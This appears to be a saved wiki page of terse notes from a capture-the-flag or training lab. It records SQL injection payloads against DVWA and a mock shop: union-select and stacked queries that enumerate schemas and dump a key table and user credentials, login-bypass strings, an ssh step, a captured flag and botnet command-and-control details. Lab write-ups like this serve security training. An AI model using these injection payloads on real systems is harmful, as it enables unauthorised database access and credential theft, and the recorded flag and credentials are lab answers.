This is an old revision of the document!
SQL INJECTION
select TABLE_NAME, TABLE_SCHEMA from information_schema.tables;
select TABLE_NAME, COLUMN_NAME from information_schema.columns;
select last_name, first_name from users union select 1,2;
select last_name, first_name from users union select version(),user();
select * from users union select 1,2,3,4,5,6;
select * from dvla.users union select TABLE_NAME, COLUMN_NAME, 1,2,3,4 from information_schema.columns;
select first_name, last_name from dvwa.users where user_id = 1;
username = “test' or 1 – ” password = “test”
email address = “some@one.com”
username = “a' or 1 and id<>1; – # ”
Order number = 4 Name of first order = DDOSXXL
db = dbm one table = bkeys
Goto shop
a'; select TABLE_NAME, TABLE_SCHEMA from information_schema.tables;
a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; shows bkeys table has 2 columns - id and backup_key
a'; select * from dbm.bkeys where id=1; shows backup_key = horsebatterystablecorrect
a'; select 1, TABLE_NAME, TABLE_SCHEMA from information_schema.tables; shows db=cyber with one of its table = shop_users;
a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; shows table shop_users with columns id, username, password, email, role
a'; select * from cyber.shop_users; user = “ThisIsNotAFruit” password=“b2n2n2”
ssh admin@support.dbm.hl
Killing this host…Great job. The key is: YOUROCK
BOTNET
PORT 1777 ROUTER 192.168.6.254 192.168.6.0/24 192.168.6.66 = COMMMAND and CONTROL CENTRE
Bypass login How can I control the bots?